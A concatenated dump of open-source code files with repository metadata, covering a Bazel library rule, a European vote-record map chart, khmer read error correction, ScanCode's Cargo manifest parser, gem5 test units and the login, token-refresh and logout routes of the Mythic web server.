        "%{os}/lib/intel64/libdaal_mkl_sequential.a",
        "%{os}/lib/intel64/libdaal_vmlipp_core.a",
    ],
    build_template = "@onedal//dev/bazel/deps:micromkl.tpl.BUILD",
)

# Repository rule exposing the DPC++ (SYCL) flavor of the prebuilt libraries.
micromkl_dpc_repo = repos.prebuilt_libs_repo_rule(
    includes = [
        "include",
    ],
    libs = [
        "lib/intel64/libdaal_sycl.a",
    ],
    build_template = "@onedal//dev/bazel/deps:micromkldpc.tpl.BUILD",
)
|
dataviz/euvotes.py | Udzu/pudzu | 119 | 10893 | from pudzu.charts import *
from pudzu.sandbox.bamboo import *
import seaborn as sns
# generate map
df = pd.read_csv("datasets/euvotes.csv").set_index('country')

palette = tmap(RGBA, sns.cubehelix_palette(11, start=0.2, rot=-0.75))
# Vote-count bucket boundaries, descending; the final 0 makes the last
# bucket catch everything below 100,000.
ranges = [20000000,10000000,5000000,2000000,1000000,500000,200000,100000,0]

def votecolfn(n):
    # Map a vote count to a palette entry: the first bucket whose lower
    # bound n reaches picks the color (larger counts -> higher indices).
    return palette[8 - next(i for i,x in enumerate(ranges) if n >= x)]

def colorfn(c):
    # Fill color per map region: white for sea/borders, grey for countries
    # without data, otherwise the bucket color of the country's vote record.
    if c not in df.index:
        return "white" if c in ['Sea', 'Borders'] else "grey"
    return votecolfn(int(df.loc[c].votes))

def labelfn(c):
    # Country label: "<leader surname> '<yy>\n(<votes>M)", or None if unmapped.
    if c not in df.index: return None
    dfc = df.loc[c]
    label = "{name} '{year}\n({votes:.2g}M)".format(name=dfc.leader.split(" ")[-1], year=dfc.year[2:], votes=int(dfc.votes) / 1000000)
    return Image.from_text(label, arial(14, bold=True), align="center", padding=2)
# NOTE(review): "map" shadows the builtin; harmless here but worth renaming.
map = map_chart("maps/Europe.png", colorfn, labelfn)

# legend
def box(c):
    # 30x30 color swatch for the legend.
    # NOTE(review): the from_text("") overlay appears to be a no-op --
    # confirm whether a label was intended here.
    return Image.new("RGBA", (30, 30), c).place(Image.from_text("", arial(16, bold=True), "black", bg=c))

vote_arr = Image.from_array([
    [box(votecolfn(n)), Image.from_text("<0.1M" if n < 100000 else ">{:.2g}M".format(n/1000000), arial(16), padding=(10,0))] for n in ranges
], bg="white", xalign=0)
vote_leg = Image.from_column([Image.from_text("# votes", arial(16, bold=True)), vote_arr], bg="white", xalign=0, padding=(0,5))
note_leg = Image.from_text("Multi-party national elections for executive head or party.", arial(16), max_width=100, bg="white", padding=(0,2))
legend = Image.from_column([vote_leg, note_leg], bg="white", xalign=0, padding=5).pad(1, "black")
chart = map.place(legend, align=(1,0), padding=10)

title = Image.from_column([
    Image.from_text("EUROPEAN POPULAR VOTE RECORDS", arial(48, bold=True)),
    Image.from_text("candidate or party with the highest absolute popular vote", arial(36))],
    bg="white")

img = Image.from_column([title, chart], bg="white", padding=2)
# Watermark in the bottom-right corner, drawn in place (copy=False).
img.place(Image.from_text("/u/Udzu", font("arial", 16), fg="black", bg="white", padding=5).pad((1,1,0,0), "black"), align=1, padding=10, copy=False)
img.save("output/euvotes.png")
|
sandbox/error-correct-pass2.py | sadeepdarshana/khmer | 558 | 10906 | #! /usr/bin/env python
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2011-2015, Michigan State University.
# Copyright (C) 2015, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: <EMAIL>
"""
Error correct reads based on a counting hash from a diginorm step.
Output sequences will be put in inputfile.corr.
% python scripts/error-correct-pass2 <counting.ct> <data1> [ <data2> <...> ]
Use '-h' for parameter help.
"""
import sys
import os
import screed
import khmer
from khmer import Countgraph
from khmer import khmer_args
from khmer.khmer_args import FileType as khFileType
DEFAULT_CUTOFF = 2
def output_single(read, new_sequence):
    """Format *read* with *new_sequence* as a FASTQ or FASTA record string.

    When the read carries quality values, quality is trimmed to the
    corrected sequence and the sequence is trimmed to the quality string in
    turn (the correction may have lengthened the sequence), then a FASTQ
    record is emitted.  Reads without (truthy) quality are emitted as FASTA.
    """
    sequence = new_sequence
    quality = getattr(read, 'quality', None)

    if quality is not None:
        quality = quality[:len(sequence)]
        sequence = sequence[:len(quality)]  # sequence is _lengthened_

    if quality:
        assert len(sequence) == len(quality), (sequence, quality)
        return "@%s\n%s\n+\n%s\n" % (read.name, sequence, quality)
    return ">%s\n%s\n" % (read.name, sequence)
def main():
    # Command-line entry point: align each read in `readfile` against the
    # counting table and write corrected sequences to <readfile>.corr
    # (or to --output).
    parser = khmer_args.build_counting_args(
        "Correct reads against an already-computed table",
        citations=['counting', 'SeqAn'])
    parser.add_argument("--trusted-cov", dest="trusted_cov", type=int,
                        default=DEFAULT_CUTOFF)
    parser.add_argument("--theta", dest="bits_theta", type=float, default=1.0)
    parser.add_argument('-o', '--output', dest='output_file',
                        help="output file for histogram; defaults to "
                             "<first filename>.corr in cwd.",
                        type=khFileType('w'), default=None)
    parser.add_argument('counts_table')
    parser.add_argument('readfile')
    args = parser.parse_args()

    print('loading counts')
    ht = Countgraph.load(args.counts_table)

    aligner = khmer.ReadAligner(ht,
                                args.trusted_cov,
                                args.bits_theta)

    print("trusted:", args.trusted_cov)

    corrfp = args.output_file
    if not corrfp:
        outfile = os.path.basename(args.readfile) + '.corr'
        # NOTE(review): opened here but never explicitly closed; relies on
        # interpreter shutdown to flush -- consider a context manager.
        corrfp = open(outfile, 'w')

    n_corrected = 0
    for n, read in enumerate(screed.open(args.readfile)):
        if n % 10000 == 0:
            # periodic progress report: reads seen / reads corrected
            print('...', n, n_corrected, file=sys.stderr)
        seq = read.sequence.replace('N', 'A')  # aligner handles A/C/G/T only

        # build the alignment...
        score, graph_alignment, read_alignment, truncated = \
            aligner.align(seq)

        if not truncated:
            # strip gap characters to recover the corrected sequence
            graph_seq = graph_alignment.replace("-", "")
            if graph_seq != seq:
                n_corrected += 1

            seq = graph_seq

        corrfp.write(output_single(read, seq))

if __name__ == '__main__':
    main()
|
src/packagedcode/cargo.py | Siddhant-K-code/scancode-toolkit | 1,511 | 10920 | <reponame>Siddhant-K-code/scancode-toolkit<filename>src/packagedcode/cargo.py
# Copyright (c) nexB Inc. and others. All rights reserved.
# ScanCode is a trademark of nexB Inc.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/scancode-toolkit for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import logging
import re
import attr
from packageurl import PackageURL
import toml
from commoncode import filetype
from commoncode import fileutils
from packagedcode import models
"""
Handle Rust cargo crates
"""
TRACE = False
logger = logging.getLogger(__name__)
if TRACE:
import sys
logging.basicConfig(stream=sys.stdout)
logger.setLevel(logging.DEBUG)
@attr.s()
class RustCargoCrate(models.Package):
    """Base package type for Rust crates distributed through crates.io."""

    default_type = 'cargo'
    default_primary_language = 'Rust'
    default_web_baseurl = 'https://crates.io'
    default_download_baseurl = 'https://crates.io/api/v1'
    default_api_baseurl = 'https://crates.io/api/v1'

    @classmethod
    def get_package_root(cls, manifest_resource, codebase):
        """Return the root Resource for a package given its manifest."""
        return manifest_resource.parent(codebase)

    def repository_homepage_url(self, baseurl=default_web_baseurl):
        """Return the crates.io page URL, or None when the name is unknown."""
        if not self.name:
            return None
        return f'{baseurl}/crates/{self.name}'

    def repository_download_url(self, baseurl=default_download_baseurl):
        """Return the crate download URL, or None without both name and version."""
        if not (self.name and self.version):
            return None
        return f'{baseurl}/crates/{self.name}/{self.version}/download'

    def api_data_url(self, baseurl=default_api_baseurl):
        """Return the crates.io API URL, or None when the name is unknown."""
        if not self.name:
            return None
        return f'{baseurl}/crates/{self.name}'
@attr.s()
class CargoToml(RustCargoCrate, models.PackageManifest):
    """Package manifest for a Cargo.toml file."""

    file_patterns = ('Cargo.toml',)
    extensions = ('.toml',)

    @classmethod
    def is_manifest(cls, location):
        """
        Return True if the file at ``location`` is likely a manifest of this type.
        """
        if not filetype.is_file(location):
            return False
        return fileutils.file_name(location).lower() == 'cargo.toml'

    @classmethod
    def recognize(cls, location):
        """
        Yield one or more Package manifest objects given a file ``location`` pointing to a
        package archive, manifest or similar.
        """
        data = toml.load(location, _dict=dict)
        core = data.get('package', {})

        description = core.get('description')
        if description:
            description = description.strip()

        yield cls(
            name=core.get('name'),
            version=core.get('version'),
            description=description,
            parties=list(party_mapper(core.get('authors'), party_role='author')),
            declared_license=core.get('license'),
        )
@attr.s()
class CargoLock(RustCargoCrate, models.PackageManifest):
    """Package manifest for a Cargo.lock resolved-dependencies file."""

    file_patterns = ('Cargo.lock',)
    extensions = ('.lock',)

    @classmethod
    def is_manifest(cls, location):
        """
        Return True if the file at ``location`` is likely a manifest of this type.
        """
        is_file = filetype.is_file(location)
        return is_file and fileutils.file_name(location).lower() == 'cargo.lock'

    @classmethod
    def recognize(cls, location):
        """
        Yield one or more Package manifest objects given a file ``location`` pointing to a
        package archive, manifest or similar.
        """
        data = toml.load(location, _dict=dict)

        dependencies = []
        for entry in data.get('package', []):
            version = entry.get('version')
            purl = PackageURL(
                type='crates',
                name=entry.get('name'),
                version=version,
            ).to_string()
            dependencies.append(
                models.DependentPackage(
                    purl=purl,
                    requirement=version,
                    scope='dependency',
                    is_runtime=True,
                    is_optional=False,
                    is_resolved=True,
                )
            )

        yield cls(dependencies=dependencies)
def party_mapper(party, party_role):
    """
    Yield one Party per person in the ``party`` sequence, tagged with ``party_role``.
    https://doc.rust-lang.org/cargo/reference/manifest.html#the-authors-field-optional
    """
    for person in party:
        name, email = parse_person(person)
        yield models.Party(
            type=models.party_person,
            name=name,
            email=email,
            role=party_role,
        )
def parse_person(person):
    """
    Return a (name, email) tuple parsed from a Cargo "authors" entry string.
    Either element is None when it is not present in the entry.

    https://doc.rust-lang.org/cargo/reference/manifest.html#the-authors-field-optional
    A "person" is a string with an optional name and/or an email wrapped in
    angle brackets, in the form "name <email>".

    For example:
    >>> p = parse_person('Joe Blogg <joe@example.com>')
    >>> assert p == ('Joe Blogg', 'joe@example.com')
    >>> p = parse_person('Joe Blogg')
    >>> assert p == ('Joe Blogg', None)
    >>> p = parse_person('<joe@example.com>')
    >>> assert p == (None, 'joe@example.com')
    """
    parsed = person_parser(person)
    if not parsed:
        # No name present: fall back to the email-only pattern (which always
        # matches since its single group is optional).
        name = None
        parsed = person_parser_no_name(person)
    else:
        name = parsed.group('name')

    email = parsed.group('email')

    if name:
        name = name.strip()
    if email:
        email = email.strip('<> ')

    return name, email


# Matches "name" optionally followed by "<email>"; the name stops at the
# first "<" or "(".
person_parser = re.compile(
    r'^(?P<name>[^\(<]+)'
    r'\s?'
    r'(?P<email><([^>]+)>)?'
).match

# Matches an optional "<email>" with no leading name.
person_parser_no_name = re.compile(
    r'(?P<email><([^>]+)>)?'
).match
|
tests/testing/units.py | mandaltj/gem5_chips | 135 | 10921 | <reponame>mandaltj/gem5_chips<filename>tests/testing/units.py
#!/usr/bin/env python2.7
#
# Copyright (c) 2016 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: <NAME>
from abc import ABCMeta, abstractmethod
from datetime import datetime
import difflib
import functools
import os
import re
import subprocess
import sys
import traceback
from results import UnitResult
from helpers import *
_test_base = os.path.join(os.path.dirname(__file__), "..")
class TestUnit(object):
    """Base class for all test units.

    A test unit is a part of a larger test case. Test cases usually
    contain two types of units, run units (run gem5) and verify units
    (diff output files). All unit implementations inherit from this
    class.

    A unit implementation overrides the _run() method. The test runner
    calls the run() method, which wraps _run() to protect against
    exceptions.
    """

    __metaclass__ = ABCMeta

    def __init__(self, name, ref_dir, test_dir, skip=False):
        self.name = name
        self.ref_dir = ref_dir
        self.test_dir = test_dir
        self.force_skip = skip
        self.start_time = None
        self.stop_time = None

    def result(self, state, **kwargs):
        """Build a UnitResult, filling in the runtime unless provided."""
        if self.start_time is not None and "runtime" not in kwargs:
            self.stop_time = datetime.utcnow()
            elapsed = self.stop_time - self.start_time
            kwargs["runtime"] = elapsed.total_seconds()
        return UnitResult(self.name, state, **kwargs)

    def ok(self, **kwargs):
        return self.result(UnitResult.STATE_OK, **kwargs)

    def skip(self, **kwargs):
        return self.result(UnitResult.STATE_SKIPPED, **kwargs)

    def error(self, message, **kwargs):
        return self.result(UnitResult.STATE_ERROR, message=message, **kwargs)

    def failure(self, message, **kwargs):
        return self.result(UnitResult.STATE_FAILURE, message=message, **kwargs)

    def ref_file(self, fname):
        """Return the path of fname inside the reference directory."""
        return os.path.join(self.ref_dir, fname)

    def out_file(self, fname):
        """Return the path of fname inside the test output directory."""
        return os.path.join(self.test_dir, fname)

    def _read_output(self, fname, default=""):
        """Read an output file, returning `default` if it can't be opened."""
        try:
            with open(self.out_file(fname), "r") as f:
                return f.read()
        except IOError:
            return default

    def run(self):
        self.start_time = datetime.utcnow()
        try:
            return self.skip() if self.force_skip else self._run()
        except:
            return self.error("Python exception:\n%s" % traceback.format_exc())

    @abstractmethod
    def _run(self):
        pass
class RunGem5(TestUnit):
    """Test unit representing a gem5 run.

    Possible failure modes:
       - gem5 failed to run -> STATE_ERROR
       - timeout -> STATE_ERROR
       - non-zero exit code -> STATE_ERROR

    Possible non-failure results:
       - exit code == 0 -> STATE_OK
       - exit code == 2 -> STATE_SKIPPED
    """

    def __init__(self, gem5, gem5_args, timeout=0, **kwargs):
        super(RunGem5, self).__init__("gem5", **kwargs)

        self.gem5 = gem5
        self.args = gem5_args
        self.timeout = timeout

    def _run(self):
        # -re redirects gem5's stdout/stderr into the output directory.
        cmd = [
            self.gem5,
            "-d", self.test_dir,
            "--stats-file", "text://stats.txt?desc=False",
            "-re",
        ]
        cmd += self.args

        try:
            with ProcessHelper(cmd, stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE) as p:
                status, gem5_stdout, gem5_stderr = p.call(timeout=self.timeout)
        except CallTimeoutException as te:
            return self.error("Timeout", stdout=te.stdout, stderr=te.stderr)
        except OSError as ose:
            return self.error("Failed to launch gem5: %s" % ose)

        stderr = "\n".join([
            "*** gem5 stderr ***",
            gem5_stderr,
            "",
            "*** m5out/simerr ***",
            self._read_output("simerr"),
        ])

        stdout = "\n".join([
            "*** gem5 stdout ***",
            gem5_stdout,
            "",
            "*** m5out/simout ***",
            self._read_output("simout"),
        ])

        if status < 0:
            # A negative return code means the process died from a signal.
            return self.error("gem5 terminated by signal %i" % (-status, ),
                              stdout=stdout, stderr=stderr)
        if status == 2:
            # gem5 uses exit status 2 to request that the test be skipped.
            return self.skip(stdout=stdout, stderr=stderr)
        if status > 0:
            return self.error("gem5 exited with non-zero status: %i" % status,
                              stdout=stdout, stderr=stderr)
        return self.ok(stdout=stdout, stderr=stderr)
class DiffOutFile(TestUnit):
    """Test unit comparing and output file and a reference file."""

    # regular expressions of lines to ignore when diffing outputs
    diff_ignore_regexes = {
        "simout" : [
            re.compile('^Redirecting (stdout|stderr) to'),
            re.compile('^gem5 compiled '),
            re.compile('^gem5 started '),
            re.compile('^gem5 executing on '),
            re.compile('^command line:'),
            re.compile("^Couldn't import dot_parser,"),
            re.compile("^info: kernel located at:"),
            re.compile("^Couldn't unlink "),
            re.compile("^Using GPU kernel code file\(s\) "),
        ],
        "simerr" : [
            #re.compile('^Simulation complete at'),
        ],
        "config.ini" : [
            re.compile("^(executable|readfile|kernel|image_file)="),
            re.compile("^(cwd|input|codefile)="),
        ],
        "config.json" : [
            re.compile(r'''^\s*"(executable|readfile|kernel|image_file)":'''),
            re.compile(r'''^\s*"(cwd|input|codefile)":'''),
        ],
    }

    def __init__(self, fname, **kwargs):
        super(DiffOutFile, self).__init__("diff[%s]" % fname,
                                          **kwargs)

        self.fname = fname
        self.line_filters = DiffOutFile.diff_ignore_regexes.get(fname, tuple())

    def _filter_file(self, fname):
        """Yield the lines of fname that match none of the ignore patterns."""
        with open(fname, "r") as f:
            for line in f:
                if not any(r.match(line) for r in self.line_filters):
                    yield line

    def _run(self):
        fname = self.fname
        ref = self.ref_file(fname)
        out = self.out_file(fname)

        for path, where in ((ref, "reference"), (out, "output")):
            if not os.path.exists(path):
                return self.error("%s doesn't exist in %s directory" \
                                  % (fname, where))

        diff = list(difflib.unified_diff(
            tuple(self._filter_file(ref)),
            tuple(self._filter_file(out)),
            fromfile="ref/%s" % fname, tofile="out/%s" % fname))

        if not diff:
            return self.ok(stdout="-- ref/%s and out/%s are identical --" \
                           % (fname, fname))
        return self.error("ref/%s and out/%s differ" % (fname, fname),
                          stderr="".join(diff))
class DiffStatFile(TestUnit):
    """Test unit comparing two gem5 stat files."""

    def __init__(self, **kwargs):
        super(DiffStatFile, self).__init__("stat_diff", **kwargs)

        self.stat_diff = os.path.join(_test_base, "diff-out")

    def _run(self):
        # Exit codes of the diff-out helper script.
        STATUS_OK = 0
        STATUS_NEW_STATS = 1
        STATUS_FAILED = 2

        stats = "stats.txt"
        cmd = [self.stat_diff, self.ref_file(stats), self.out_file(stats)]

        with ProcessHelper(cmd,
                           stdout=subprocess.PIPE,
                           stderr=subprocess.PIPE) as p:
            status, stdout, stderr = p.call()

        if status == STATUS_FAILED:
            return self.failure("Statistics mismatch",
                                stdout=stdout, stderr=stderr)
        if status in (STATUS_OK, STATUS_NEW_STATS):
            return self.ok(stdout=stdout, stderr=stderr)
        return self.error("diff-out returned an error: %i" % status,
                          stdout=stdout, stderr=stderr)
|
mythic-docker/app/routes/routes.py | rmusser01/Mythic | 934 | 10922 | <reponame>rmusser01/Mythic<gh_stars>100-1000
from app import (
mythic,
links,
nginx_port,
listen_port,
mythic_admin_password,
mythic_admin_user,
default_operation_name,
mythic_db
)
import app
import asyncpg
import redis
from peewee_async import Manager
from sanic.response import json
from sanic import response
from sanic.exceptions import (
NotFound,
Unauthorized,
MethodNotSupported,
SanicException,
RequestTimeout,
)
import sys
from jinja2 import Environment, PackageLoader
from app.database_models.model import (
Operator,
Operation,
OperatorOperation,
ATTACK,
Artifact,
)
import datetime
import app.crypto as crypto
from sanic_jwt import BaseEndpoint, utils, exceptions
from sanic_jwt.decorators import scoped, inject_user
import ujson as js
from ipaddress import ip_address
from app.routes.authentication import invalidate_refresh_token
import app.database_models.model as db_model
from sanic.log import logger
from uuid import uuid4
import asyncio
env = Environment(loader=PackageLoader("app", "templates"), autoescape=True)
async def respect_pivot(my_links, request):
    """
    Return a copy of ``my_links`` with server_ip/server_port rewritten to
    match how this request reached us, so users pivoting through a tunnel
    (e.g. 127.0.0.1:8888) get links that still work from their side.
    """
    # Work on a copy: ``my_links`` is typically the module-level ``links``
    # dict shared by every request, and mutating it in place would leak one
    # request's host/port into pages rendered for other clients.
    updated_links = dict(my_links)
    host_field = request.host.split(":")
    if len(host_field) == 1:
        server_ip = host_field[0]
        # No explicit port in the Host header: prefer the reverse-proxy
        # header, otherwise fall back to the scheme-appropriate default.
        if 'x-forwarded-port' in request.headers:
            server_port = request.headers["x-forwarded-port"]
        else:
            server_port = nginx_port if request.scheme == "https" else listen_port
    else:
        server_ip = host_field[0]
        server_port = host_field[1]
    updated_links["server_ip"] = server_ip
    updated_links["server_port"] = server_port
    updated_links["login"] = "/login"
    return updated_links
async def getSchemes(request):
    """
    Return the URL scheme names ({"http": ..., "ws": ...}) for rendered links,
    honoring an x-forwarded-proto header from a reverse proxy before falling
    back to the scheme of the request itself.
    """
    proto = request.headers.get("x-forwarded-proto", request.scheme)
    if proto == "http":
        return {"http": "http", "ws": "ws"}
    return {"http": "https", "ws": "wss"}
@mythic.route("/")
@inject_user()
@scoped("auth:user")
async def index(request, user):
    """Render the main Mythic page for the authenticated operator."""
    template = env.get_template("main_page.html")
    rendered = template.render(
        name=user["username"],
        config=user["ui_config"],
        view_utc_time=user["view_utc_time"],
        current_operation=user["current_operation"],
        links=await respect_pivot(links, request),
        ** await getSchemes(request)
    )
    return response.html(rendered)
class Login(BaseEndpoint):
    """Browser login endpoint: GET renders the form, POST authenticates."""

    async def get(self, request):
        """Render the empty login form."""
        error = ""
        template = env.get_template("login.html")
        content = template.render(
            links=await respect_pivot(links, request),
            error=error,
            config={},
            view_utc_time=False,
            ** await getSchemes(request)
        )
        return response.html(content)

    async def post(self, request):
        """Validate submitted credentials and, on success, render the page
        with JWT access/refresh cookies set.

        Lockout behavior visible below: accounts other than the built-in
        admin (id 1) are deactivated after 10 consecutive failures; the
        admin account is instead throttled to one attempt per minute.
        """
        form = request.form
        error = ""
        username = None
        # Prefer the reverse-proxy-provided client address when present.
        ip = request.headers["x-real-ip"] if "x-real-ip" in request.headers else request.ip
        from app.api.operation_api import send_all_operations_message
        try:
            username = form["username"][0] if 'username' in form and len(form['username']) > 0 else ""
            password = form["password"][0] if 'password' in form and len(form['password']) > 0 else ""
            user = await app.db_objects.get(db_model.operator_query, username=username)
            # Admin throttling: >10 failures and the last failure was within
            # the past 60 seconds.
            if user.id == 1 and user.failed_login_count > 10 and (user.last_failed_login_timestamp
                    > datetime.datetime.utcnow() + datetime.timedelta(seconds=-60)):
                # throttle their attempts to log in to 1 min between checks
                error = "Too many failed login attempts, try again later"
                user.failed_login_count += 1
                user.last_failed_login_timestamp = datetime.datetime.utcnow()
                await app.db_objects.update(user)
                await send_all_operations_message(message=f"Throttling login attempts for {user.username} due to too many failed login attempts\nLast connection from {ip}",
                                                  level="warning", source="throttled_login_" + user.username)
            elif not user.active:
                error = "Account is not active, cannot log in"
                await send_all_operations_message(message=f"Deactivated account {user.username} trying to log in from {ip}",
                                                  level="warning", source="deactivated_login_" + user.username)
            elif await user.check_password(password):
                # Successful login: reset failure counters, log the event,
                # mint tokens and set them as cookies.
                try:
                    # update the last login time to be now
                    user.last_login = datetime.datetime.utcnow()
                    user.failed_login_count = 0
                    await app.db_objects.update(user)
                    if user.current_operation is not None:
                        # update that operations' event log that the user just signed in
                        await app.db_objects.create(
                            db_model.OperationEventLog,
                            operator=None,
                            operation=user.current_operation,
                            message="{} signed in from {}".format(user.username, ip),
                        )
                    (
                        access_token,
                        output,
                    ) = await self.responses.get_access_token_output(
                        request,
                        {"user_id": user.id, "auth": "cookie"},
                        self.config,
                        self.instance,
                    )
                    refresh_token = (
                        await self.instance.auth.generate_refresh_token(
                            request, {"user_id": user.id, "auth": "cookie"}
                        )
                    )
                    output.update(
                        {self.config.refresh_token_name(): refresh_token}
                    )
                    template = env.get_template("login.html")
                    content = template.render(
                        links=await respect_pivot(links, request),
                        error=error,
                        access_token=access_token,
                        ** await getSchemes(request),
                        refresh_token=refresh_token,
                        config={},
                        view_utc_time=False,
                    )
                    resp = response.html(content)
                    # resp = response.redirect("/")
                    # httponly + samesite=strict keeps the JWT cookies away
                    # from page scripts and cross-site requests.
                    resp.cookies[
                        self.config.cookie_access_token_name()
                    ] = access_token
                    resp.cookies[self.config.cookie_access_token_name()][
                        "httponly"
                    ] = True
                    resp.cookies[self.config.cookie_access_token_name()][
                        "samesite"
                    ] = "strict"
                    resp.cookies[
                        self.config.cookie_refresh_token_name()
                    ] = refresh_token
                    resp.cookies[self.config.cookie_refresh_token_name()][
                        "httponly"
                    ] = True
                    resp.cookies[self.config.cookie_refresh_token_name()][
                        "samesite"
                    ] = "strict"
                    return resp
                except Exception as e:
                    print(str(sys.exc_info()[-1].tb_lineno) + " " + str(e))
                    logger.error("post login error:" + str(e))
            else:
                # user exists, but password is wrong
                error = "Username or password invalid"
                user.failed_login_count += 1
                if user.failed_login_count >= 10 and user.active:
                    user.last_failed_login_timestamp = datetime.datetime.utcnow()
                    if user.id != 1:
                        user.active = False
                        await send_all_operations_message(message=f"Deactivating account {user.username} due to too many failed logins.\nLast connection from {ip}",
                                                          level="warning")
                await app.db_objects.update(user)
        except Exception as e:
            if username is not None:
                logger.warning("login error: " + str(e))
            # Same generic message as a bad password, so responses don't
            # reveal which usernames exist.
            error = "Username or password invalid"
            await send_all_operations_message(message=f"Attempt to login with unknown user: {username}, from {ip}",
                                              level="warning", source="unknown_login" + ip)
        template = env.get_template("login.html")
        content = template.render(
            links=await respect_pivot(links, request),
            error=error,
            config={},
            view_utc_time=False,
            ** await getSchemes(request)
        )
        return response.html(content)
class UIRefresh(BaseEndpoint):
    """Refresh an expired browser access token and redirect back."""

    async def get(self, request, *args, **kwargs):
        # go here if we're in the browser and our JWT expires so we can update it and continue on
        payload = self.instance.auth.extract_payload(request, verify=True)
        try:
            user = await utils.call(
                self.instance.auth.retrieve_user, request, payload=payload
            )
        except exceptions.MeEndpointNotSetup:
            raise exceptions.RefreshTokenNotImplemented

        user_id = await self.instance.auth._get_user_id(user)
        refresh_token = await utils.call(
            self.instance.auth.retrieve_refresh_token,
            request=request,
            user_id=user_id,
        )
        if isinstance(refresh_token, bytes):
            refresh_token = refresh_token.decode("utf-8")
        # The refresh token presented by the client must match the stored one.
        token = await self.instance.auth.retrieve_refresh_token_from_request(request)
        if refresh_token != token:
            raise exceptions.AuthenticationFailed()
        access_token, output = await self.responses.get_access_token_output(
            request, user, self.config, self.instance
        )
        # Send the user back where they came from with a fresh access cookie.
        redirect_to = (
            request.headers["referer"] if "referer" in request.headers else "/"
        )
        resp = response.redirect(redirect_to)
        resp.cookies[self.config.cookie_access_token_name()] = access_token
        resp.cookies[self.config.cookie_access_token_name()]["httponly"] = True
        return resp
@mythic.route("/settings", methods=["GET"])
@inject_user()
@scoped("auth:user")
async def settings(request, user):
    """Render the operator settings page."""
    template = env.get_template("settings.html")
    try:
        rendered = template.render(
            name=user["username"],
            config=user["ui_config"],
            view_utc_time=user["view_utc_time"],
            links=await respect_pivot(links, request),
            ** await getSchemes(request),
        )
        return response.html(rendered)
    except Exception as e:
        logger.error(str(e))
        return json({"status": "error", "error": "Failed to find operator"})
@mythic.route("/logout")
@inject_user()
@scoped("auth:user")
async def logout(request, user):
    """Clear auth cookies, record the sign-out, and revoke refresh tokens."""
    resp = response.redirect("/login")
    del resp.cookies["access_token"]
    del resp.cookies["refresh_token"]
    operator = await app.db_objects.get(db_model.operator_query, id=user["id"])
    if operator.current_operation is not None:
        # Note the sign-out in the current operation's event log.
        await app.db_objects.create(
            db_model.OperationEventLog,
            operator=None,
            operation=operator.current_operation,
            message=f"{operator.username} signed out",
        )
    # Revoke the server-side refresh token so the cookies can't be replayed.
    await invalidate_refresh_token(user["id"])
    return resp
@mythic.exception(asyncio.CancelledError)
async def handle_cancellation(request, exception):
    """Log and report requests that were cancelled mid-flight."""
    logger.info("Request %s was cancelled" % (request,))
    return json({"status": "error", "error": "Request was cancelled"}, status=500)
@mythic.exception(NotFound)
async def handler_404(request, exception):
    """Return a JSON 404 for unknown routes."""
    body = {"status": "error", "error": "Not Found"}
    return json(body, status=404)
@mythic.exception(MethodNotSupported)
